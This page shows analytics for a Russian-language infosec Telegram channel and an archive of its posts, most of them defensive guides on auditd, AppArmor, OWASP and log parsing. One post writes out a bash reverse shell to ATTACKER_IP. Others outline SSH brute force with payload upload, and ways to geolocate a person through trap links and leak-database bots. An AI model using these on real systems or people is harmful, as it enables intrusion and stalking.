uz
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

Yopiq kanal

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Ko'proq ko'rsatish

📈 Telegram kanali CodeGuard: PySec Edition analitikasi

CodeGuard: PySec Edition kanali faol ishtirokchi. Hozirda hamjamiyat 14 173 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 8 752-o'rinni va Rossiya mintaqasida 45 689-o'rinni egallagan.

📊 Auditoriya ko‘rsatkichlari va dinamika

невідомо sanasidan buyon loyiha tez o‘sib, 14 173 obunachiga ega bo‘ldi.

28 Sentabr, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 820 ga, so‘nggi 24 soatda esa 28 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.

  • Tasdiqlash holati: Tasdiqlanmagan
  • Jalb etish (ER): Auditoriya o‘rtacha 9.75% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 5.54% ini tashkil etuvchi reaksiyalarni to‘playdi.
  • Post qamrovi: Har bir post o‘rtacha 1 377 marta ko‘riladi; birinchi sutkada odatda 782 ta ko‘rish yig‘iladi.
  • Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 7 ta reaksiya keladi.
  • Tematik yo‘nalishlar: Kontent codeguard, pysec, docker, grep, контейнер kabi asosiy mavzularga jamlangan.

📝 Tavsif va kontent siyosati

Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

Yuqori yangilanish chastotasi (oxirgi ma’lumot 29 Sentabr, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.

14 173
Obunachilar
+2824 soatlar
+1467 kun
+82030 kun
Postlar arxiv
Есть победители?))

🚩 Бесплатный базовый курс по CTF на Stepik Если хотите познакомиться с самыми важными направлениями в CTF и инфобезе, этот к
🚩 Бесплатный базовый курс по CTF на Stepik Если хотите познакомиться с самыми важными направлениями в CTF и инфобезе, этот курс — отличное стартовое решение. Включает 7 блоков и множество практических задач:
➡️Введение и работа с терминалом ➡️ Криптография ➡️ Сети ➡️ Стеганография ➡️ Разведка по открытым источникам (OSINT) ➡️ Компьютерная криминалистика ➡️ Обратная разработка
📚 26 уроков, 42 минуты видео и 60 тестов — видно что делали, как могли)) Курс подходит студентам и всем, кто хочет освоить базовые навыки информационной безопасности и подготовиться к CTF-соревнованиям. ➡️ Курс по CTF на Stepik ⭐️ CodeGuard | #CTF #stepik #infosec #pentest

⭐️ Лучшие сервисы для проверки паролей на утечки в 2025 году: Have I Been Pwned Один из самых популярных и проверенных сервисов, собирает миллионы скомпрометированных записей. Можно проверить почту и пароль, получить уведомления о новых утечках. How Secure Is My Password? Быстрая проверка надежности пароля с рекомендациями по усилению. SpyCloud Check Your Exposure Анализ рисков для бизнеса, проверки наличия вредоносного ПО и скомпрометированных сессий. LeakCheck Инструмент для мониторинга и проверки утечек популярных данных. Firefox Monitor Бесплатный сервис от Mozilla с автоматическими уведомлениями. GhostProject Огромная база скомпрометированных аккаунтов с возможностью поиска по почте. BreachAlarm Проверка почты на утечки, автоматические оповещения, дополнительные сервисы для бизнес-пользователей. 💡 Рекомендуется регулярно проверять свои аккаунты на подобных сервисах и использовать сложные уникальные пароли, а также двухфакторную аутентификацию. 😈 CodeGuard

Программисты, это вам 👇 Держите 5 каналов, которые реально помогают изучать программирование и IT с полного нуля: 🖥 Easy Co
Программисты, это вам 👇 Держите 5 каналов, которые реально помогают изучать программирование и IT с полного нуля: 🖥 Easy Coder — все направления IT. 👩‍💻 Easy Python — всё о Python. 🌐 Easy WebDev — Frontend, Backend. 🔠 Easy InfoSec — ИБ, Хакинг. 🐱 Easy GitHub — лучшее с GitHub. Тонны полезной инфы для любого уровня подготовки ✔️

💾 Rsync: подробное руководство для админов Привет, участникам CodeGuard! В арсенале системного администратора и разработчика
💾 Rsync: подробное руководство для админов Привет, участникам CodeGuard! В арсенале системного администратора и разработчика есть множество инструментов для переноса данных. Мы копируем файлы десятки раз в день: «cp» для локальных копий, «scp» для удалённых серверов. Но что если задача сложнее? Нужно не просто скопировать, а синхронизировать два дерева файлов, дёргая по сети лишь изменившиеся данные? Или поддерживать в актуальном состоянии зеркало веб‑контента? Идея написать эту статью (а впоследствии и целую серию) родилась из многократного наблюдения одной и той же истории: многие знакомые годами используют «rsync» процентов на 10, даже не зная о возможностях, которые «прячутся» за его синтаксисом. А те, кто пытается погрузиться глубже, часто сталкиваются с отсутствием более‑менее полных руководств с примерами.
О чём эта статья? — Фундамент: как правильно путями в rsync и почему слеш в конце решает всё. — Три основных режима работы: локально, с сервером и между серверами. — Разбор «волшебного» флага -a: что скрывается под капотом. — Главные опции: как сделать вывод подробным, а работу — безопасной. — Синхронизация поверх SSH: работа с нестандартными портами. — Самые опасные «грабли» и как их избежать.
😎Можно глянуть позже 😈 CodeGuard | #linux

❗️ OWASP Top 10 — самые опасные уязвимости веб-приложений и методы защиты Список из десяти главных угроз, с которыми сталкива
❗️ OWASP Top 10 — самые опасные уязвимости веб-приложений и методы защиты Список из десяти главных угроз, с которыми сталкиваются разработчики и специалисты по безопасности. Знать их — значит максимально защитить своё приложение.
Кратко по главному: 🔸Инъекции (SQL, XSS и пр.) — фильтруйте и используйте подготовленные запросы 🔸 Поломанная аутентификация — внедряйте многофакторную аутентификацию (MFA) 🔸 Разглашение данных — шифруйте и храните данные правильно 🔸 Нарушение контроля доступа — проверяйте права на стороне сервера 🔸 Небезопасная конфигурация — закройте ненужные порты и обновляйте ПО 🔸 Устаревшие компоненты — следите за обновлениями 🔸 Ошибки идентификации — ограничивайте попытки входа и применяйте MFA 🔸 Целостность ПО — проверяйте цифровые подписи и хэшируйте 🔸 Логирование и мониторинг — ведите логи и анализируйте их 🔸 SSRF — фильтруйте доступ к внутренним ресурсам
Понимайте угрозы, применяйте защиту — и ваш софт станет крепким щитом против атак. ⭐️ Примеры и разбор здесь ⭐️ CodeGuard | #OWASP #WebSecurity

⭐️ Отслеживаем SSH-сессии и аудит команд в Linux с auditd и ausearch Контроль за SSH-сессиями и выполнением команд — важная часть безопасности сервера. auditd — мощный демон аудита в Linux, а ausearch — удобный инструмент для анализа логов. Вместе они позволяют детально понимать, кто и что делал в системе. 🚀 Шаг 1. Установка auditd В большинстве дистрибутивов auditd установлен по умолчанию. Если нет — ставим:
sudo apt-get install auditd
sudo systemctl start auditd
sudo systemctl enable auditd
⭐️ Шаг 2. Создаём правило аудита открытия SSH-сессий Следим за запуском sshd и выполнением команд через системные вызовы:
sudo auditctl -a exit,always -F arch=b64 -S execve -F path=/usr/sbin/sshd -k ssh-session
И для 32-битных систем:
sudo auditctl -a exit,always -F arch=b32 -S execve -F path=/usr/sbin/sshd -k ssh-session
⚙️ Шаг 3. Аудит изменений важных файлов SSH Например, контролируем изменения конфигурации sshd:
sudo auditctl -w /etc/ssh/sshd_config -p wa -k ssh-config
-w — путь к файлу -p wa — наблюдать за записью и атрибутами -k — тег для удобства поиска 📊Шаг 4. Просмотр и фильтрация логов с помощью ausearch Ищем логи с тегом ssh-session:
sudo ausearch -k ssh-session -i
Опция -i форматирует вывод в читаемый вид. Или события с изменениями конфигурации:
sudo ausearch -k ssh-config -i
🦜 Шаг 5. Можно искать записи за конкретное время:
sudo ausearch -k ssh-session --start today -i
💡Рекомендация: - Для постоянных правил добавляйте их в /etc/audit/audit.rules или /etc/audit/rules.d/ - Используйте aureport для генерации сводных отчётов - Помните о производительности — не ставьте правил слишком много auditd с ausearch — это серьёзный инструмент для контроля всей активности по SSH и безопасности. Идеально подходит для расследования инцидентов и аудита пользователей. 😈 CodeGuard | #auditd #ausearch #SSH

💀 [Перевод] MalTerminal: первый вирус, который пишет сам себя с помощью ИИ Представьте: хакеру больше не нужно сидеть ночами
💀 [Перевод] MalTerminal: первый вирус, который пишет сам себя с помощью ИИ Представьте: хакеру больше не нужно сидеть ночами, вылизывая строчки кода для нового вируса. Достаточно открыть чат с ИИ и написать: «Сделай мне вредоносную программу, которая обойдёт защиту Windows 11 и зашифрует файлы» . Через минуту — готово. Звучит как фантастика? Увы, это уже реальность. Исследователи из компании SentinelOne наткнулись на нечто по-настоящему пугающее — MalTerminal. Это не просто очередной троян. Это впервые в истории , когда вредоносная программа полностью полагается на ИИ — в данном случае на GPT-4 от OpenAI — чтобы думать, адаптироваться и действовать. ИИ здесь — не помощник, а главный мозг операции. Он не просто подсказывает — он принимает решения. 🔹Это может быть полезно 😈 CodeGuard | #cybersecurity

🟢 Введение в сетевые технологии — всё про модели OSI, TCP/IP, устройства и протоколы Если вы хотите понять, как устроена сет
🟢 Введение в сетевые технологии — всё про модели OSI, TCP/IP, устройства и протоколы Если вы хотите понять, как устроена сеть, как данные текут по кабелям и настраиваются сервисы — это видео от профи именно для вас. ➡️ [Видеоурок: Введение в сетевые технологии
Что вы узнаете: ⚫️Как организована сеть — какие бывают устройства, от свитчей до маршрутизаторов ⚫️ Основы протоколов передачи данных — TCP, UDP, IP и другие ⚫️ Разбор сетевая модель OSI и TCP/IP — базовые уровни, их задачи и взаимодействие ⚫️ Инструменты анализа сетевой активности (Wireshark и другие) ⚫️ Фреймворки для пентеста и сетевые средства защиты
Что реально круто — объяснения простые, с практическими примерами. Обязательно посмотрите, если ищете фундаментальное понимание современных сетей! Для закрепления — домашка )) 😈 CodeGuard | #OSI #TCPIP #Wireshark

👩‍💻 Всем программистам посвящается! Вот 17 авторских обучающих IT каналов по самым востребованным областям программирования
👩‍💻 Всем программистам посвящается! Вот 17 авторских обучающих IT каналов по самым востребованным областям программирования: Выбирай своё направление: 👩‍💻 Python — t.me/python_ready 🤔 InfoSec & Хакинг — t.me/hacking_ready 🖥 SQL & Базы Данных — t.me/sql_ready 🤖 Нейросети — t.me/neuro_ready 👩‍💻 C/C++ — https://t.me/cpp_ready 👩‍💻 C# & Unity — t.me/csharp_ready 👩‍💻 Java — t.me/java_ready 👩‍💻 Linux — t.me/linux_ready 🖼️ DevOps — t.me/devops_ready 📖 IT Книги — t.me/books_ready 👩‍💻 Frontend — t.me/frontend_ready 📱 JavaScript — t.me/javascript_ready 👩‍💻 Backend — t.me/backend_ready 📱 GitHub & Git — t.me/github_ready 👩‍💻 Весь IT — t.me/it_ready 👩‍💻 Bash & Shell — t.me/bash_ready 🖥 Design — t.me/design_ready 📌 Гайды, шпаргалки, задачи, ресурсы и фишки для каждого языка программирования!

🔐 Netexec для пентестеров: эксплуатация SSH На Hacking Articles показали, как пентестеры используют Netexec для проверки без
+3
🔐 Netexec для пентестеров: эксплуатация SSH На Hacking Articles показали, как пентестеры используют Netexec для проверки безопасности SSH-серверов.
Основные возможности:  
Перебор паролей и учетных записей для обнаружения слабых логинов  
Проверка валидности найденных учетных данных  
Удаленное выполнение команд для разведки системы и окружения  
Передача файлов — заливка payload и сбор данных (эксфильтрация)  
Netexec интегрирован с MITRE ATT&CK, что позволяет моделировать реальные атаки с целью выявления уязвимостей, но при этом действия остаются контролируемыми и обратимыми. Основной риск — слабые пароли и плохо настроенные SSH сервисы, открывающие путь к полному компромиссу системы.
Рекомендуется: - Использовать ключевую аутентификацию вместо паролей - Внедрять многофакторную аутентификацию (MFA) - Ограничивать доступ по IP и логировать действия - Применять защиту от brute force (fail2ban, rate limiting)
Руководство по эксплуатации SSH через Netexec поможет лучше понять риски и повысить безопасность ваших систем. 😈 CodeGuard | #security #pentest

💥 Часть 4 — Shell, которые используют плохие и хорошие парни В мире кибербезопасности shell — это не просто оболочка, а инструмент контроля. Хорошие парни используют один набор, чтобы тестировать и обеспечивать безопасность, а плохие — нередко тот же, но в злонамеренных целях. 🔹Популярные shell в Kali Linux: - Meterpreter — мощный шелл от Metasploit, который дает полный контроль над системой, позволяет выполнять команды и безопасно скрываться - Netcat (nc) — универсальный «швейцарский нож» для создания обратных и привязанных соединений, часто используется для получения удаленного доступа - Bash Reverse Shell — простой и легкий обратный шелл для быстрого доступа к целевой машине - Powershell — удобен для работы с Windows-системами, часто применяется как в атаке, так и в защите ⚠️ Почему стоит знать и понимать их? Понимание как работают эти оболочки поможет не только в атаках (при этичном хакинге), но и в обнаружении и нейтрализации вторжений в ваши сети. 🔍 Пример простого Bash reverse shell:
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
Этот код запускает обратное соединение с атакующим, позволяя контролировать машину через командную строку. 🖥 Часть 4 в Архиве — последний пост ⭐️ CodeGuard | Chat | #pentest #kali #course

📧 Парсинг и анализ email-логов Postfix для выявления спама и фишинга Postfix — надёжный почтовый сервер, но спам и фишинг —
📧 Парсинг и анализ email-логов Postfix для выявления спама и фишинга Postfix — надёжный почтовый сервер, но спам и фишинг — вечная головная боль. Логи Postfix — кладезь информации, где можно найти подозрительную активность, выявить проблемы с доставкой и защитить почтовую инфраструктуру. Разберёмся, как быстро парсить логи и выделять подозрительные письма. 🔍 Чего искать в логах то? - Неудачные попытки доставки (`status=bounced`, `deferred`) - Повторяющиеся попытки отправки — признак рассылки спама - Подозрительные отправители и получатели - Ошибки аутентификации и подключения - Вирусы и фишинговые клиенты 🚀 Инструмент для парсинга: — maillog — скрипт на Perl для группировки логов по письмам, выделение успешности и ошибок с цветами. Есть фильтры по дате, отправителю, получателю. Работает с ротацией логов и сжатыми файлами. — Simple Postfix Log Analyzer — простой парсер на PHP с веб-интерфейсом для удобного анализа логов, сортировки и фильтров. 🟧 Быстрый пример парсинга с grep и awk:
grep 'postfix/' /var/log/mail.log | grep 'status=bounced'
Выведет все письма с ошибками доставки — часто это источник проблем.
⚙️ Автоматизация и хранение - Ежедневная обработка логов перед ротацией — сохраняйте нужную статистику в БД - Настройка оповещений на повторяющиеся ошибки - Анализ тем писем, IP отправителей и т.п. для выявления массированных атак
➡️ Дальнейшее чтение — подробный разбор логов и генерация отчетов Парсинг логов — лучший способ следить за почтовой системой и быть на шаг впереди злоумышленников. 😈 CodeGuard | #Postfix #emailsecurity #bash

Он тимлид в российском бигтехе! Но ещё с универа мечтает о переезде в Лондон! Он отправил уже несколько тысяч откликов на вак
Он тимлид в российском бигтехе! Но ещё с универа мечтает о переезде в Лондон! Он отправил уже несколько тысяч откликов на вакансии! Позади — сотни собеседований и столько же отказов 😳 Какое-то время он даже жил в лесу, чтобы ничего не отвлекало его от подготовки к интервью. Он 14 лет в ИТ: писал сервисы, менеджерил команды, ломал монолиты и собирал новые 😅 Он видел всё — и даже то, чего не стоило бы видеть. Весь свой опыт, знания и советы он публикует в своём канале, говорит простым и понятным языком. Подпишись на его канал @artur_speaking Узнай первым о том, что тебя ждёт впереди, чтобы оставить конкурентов далеко позади, добраться до самых вершин карьеры — и наказать своих врагов и завистников 💀

📍 Как узнать геолокацию человека по номеру телефона? Мы разберём реальные способы определения местоположения человека. Помни
📍 Как узнать геолокацию человека по номеру телефона? Мы разберём реальные способы определения местоположения человека. Помни, что напрямую по номеру телефона узнать точную локацию нельзя — это доступно только операторам и правоохранительным органам. Вот готовый пост для Telegram на основе предоставленного материала: Однако есть рабочие методы, которые можно использовать, комбинируя OSINT и социальную инженерию: 🔹 Поиск аккаунтов в соцсетях по номеру телефона — можно узнать город, увлечения, круг общения. 🔹 Отсылка ссылки-ловушки с просьбой поделиться местоположением (например, через проект Storm-Breaker). 🔹 Анализ фото с геометками в соцсетях для составления карты посещаемых мест. 🔹 Получение данных о точках доступа Wi-Fi и MAC-адресах для определения приблизительного района. 🔹 Использование Telegram-ботов (Userbox, Himera Search), работающих с базами утечек — они помогут найти адрес и другую информацию, но не текущее местоположение. ⚠️ Методы исключительно в статье для информации. Пользуйтесь легальными способами и уважайте приватность 😈 CodeGuard | #OSINT

Ой-ой-ой! Куда?! Кудаа??! CodeGuard: Python — еще один новый канал?! Ты хочешь прокачать навыки программирования на Python? Т
Ой-ой-ой! Куда?! Кудаа??! CodeGuard: Python — еще один новый канал?! Ты хочешь прокачать навыки программирования на Python? Тогда тебе точно сюда! В нашем новом канале — 🔹Ежедневные разборы 🔹Полезные советы и трюки 🔹Практические примеры кода 🔹Поддержка и общение ⭐️ Подписывайся CodeGuard: Python

🛡 AppArmor и SELinux: базовое сравнение и настройка безопасности Linux В системах Linux для повышения безопасности приложений применяют два основных механизма контроля доступа — AppArmor и SELinux. Оба помогают ограничивать права процессов, но делают это по-разному. ⭐️ Что выбрать? AppArmor — основа на путях к файлам, проще в настройке и чтении, стандарт для Ubuntu и Debian. SELinux — система с метками, более гибкая и комплексная, чаще используется в RHEL, CentOS и Fedora. 🔹Проверка статуса AppArmor:
sudo aa-status
Включение и запуск:
sudo systemctl enable --now apparmor
🔹 Основные команды AppArmor: - Просмотр профилей:
sudo aa-status
- Перевод в режим жалоб (Complain) для отладки:
sudo aa-complain /path/to/profile
- Включение жесткого режима (Enforce):
sudo aa-enforce /path/to/profile
- Просмотр логов для диагностики:
journalctl -e | grep apparmor
🔹 Проверка статуса SELinux:
sestatus
Изменение режима (например, включение enforce):
sudo setenforce 1
Постоянное изменение в конфиге:
sudo nano /etc/selinux/config
# Измените SELINUX=enforcing
⚙️ Пример базового скрипта для включения AppArmor и SELinux:
#!/bin/bash

sudo systemctl enable --now apparmor
sudo aa-status

sudo setenforce 1
sestatus
✅ Практические советы: - AppArmor проще и идеален для новичков или Ubuntu/Debian-систем. - SELinux требует больше обучения, зато предлагает детальный контроль доступа. - Для новых профилей используйте режим complain в AppArmor для отладки. - Читайте логи для понимания блокируемых действий и настройки разрешений. AppArmor и SELinux — ключевые инструменты для повышения защиты Linux, заставляющие процессы работать строго по правилам доступа. Начните с простого и развивайте навыки системной безопасности! 😈 CodeGuard | #AppArmor #SELinux #bash #security

⚠️ JEA + PowerShell Remoting: Принцип минимальных привилегий в проде без боли Сегодня мы поговорим о боли. О той самой боли,
⚠️ JEA + PowerShell Remoting: Принцип минимальных привилегий в проде без боли Сегодня мы поговорим о боли. О той самой боли, которая возникает в 3 часа ночи, когда звонит дежурный инженер и говорит, что «всё лежит». Веб-приложение не отвечает, а единственный способ что-то сделать — это дать ему RDP-доступ на сервер с правами локального, а то и доменного администратора. И всё это ради одной единственной задачи: перезапустить пул приложений в IIS. Знакомая ситуация? Мы даем избыточные права, потому что это быстро и просто. Мы даем «ключ от всего города», чтобы человек мог открыть одну дверь. В этот момент мы открываем ящик Пандоры: случайная ошибка, запущенный по незнанию скрипт, а в худшем случае — скомпрометированная учетная запись, которая становится для злоумышленника плацдармом для захвата всей инфраструктуры. Проблема в том, что традиционный подход к администрированию Windows-систем часто ставит нас перед ложным выбором: либо безопасность, либо операционная эффективность. Либо мы закручиваем гайки так, что никто не может работать, либо раздаем админские права направо и налево, надеясь на лучшее. Но что, если я скажу вам, что этот выбор — ложный? Что существует технология, встроенная в Windows Server, которая позволяет нам совместить гранулярную безопасность, полный аудит и удобство автоматизации? Технология, которая превращает администрирование из «искусства» в точную инженерную дисциплину. Имя ей — Just Enough Administration (JEA), и в связке с PowerShell Remoting она способна кардинально изменить ваш подход к управлению серверами.
Эта статья — не просто теоретический обзор. Это пошаговое, выстраданное на практике руководство по внедрению JEA в реальной продакшен-среде на Windows Server 2019/2022. Мы пройдем весь путь: от понимания фундаментальных принципов до создания, развертывания и использования защищенных конечных точек (endpoints), решая по пути реальные проблемы.
📖 Читать дальше 😈 CodeGuard | #Windows #PowerShell #sysadmin

👩‍💻 Безопасность ядра Linux и эксплуатация уязвимостей: полный гид с ресурсами Linux — это не просто ОС, а целый живой организм. Чтобы стать экспертом, нужно понимать слабые места и методы их обхода. Вот моя скромная подборка ресурсов, которые помогут прокачать знания в этой теме. 💀 Начните с книг и техник: - Крупнейшая коллекция книг и материалов: [Books] - Ключевые приёмы эксплуатации: [Techniques] - Как эксплуатировать уязвимости: [Exploitation] - Приёмы обхода защит: [Protection Bypasses] 👽 Уязвимости по полочкам: - Утечки информации: [Info-leaks] - Эскалация привилегий: [LPE] - Удалённое выполнение кода: [RCE] - Другие типы уязвимостей: [Other] 🔎 Как находить баги и защищать систему: - Поиск багов: [Finding Bugs] - Защитные методики: [Defensive] - Практические эксплойты: [Exploits] 🛠 Инструменты для работы: - Fuzzers и средства тестирования: [Fuzzers] - Разное полезное: [Assorted] 👾 Практика и лаборатории: - Воркшопы и курсы: [Workshops] - Задачи для CTF: [CTF Tasks] - Другие задания: [Other Tasks] - Практические площадки: [Playgrounds] - Инфраструктура для тестов: [Infrastructure] ⚙️ Погружение во внутренности ядра: - [Первые шаги после декомпрессии ядра] - [Обработка прерываний и исключений] - [Подготовка к точке входа в ядро] - [Точка входа в ядро] - [Архитектурно-зависимая инициализация] - [Продолжение архитектурно-зависимой инициализации] - [Завершающие этапы setup_arch] - [Инициализация RCU] - [Конец инициализации] 🚀 Этого список — наработки для глубокого изучения и практики. 😈 CodeGuard | #LinuxKernel #pentesting #cybersecurity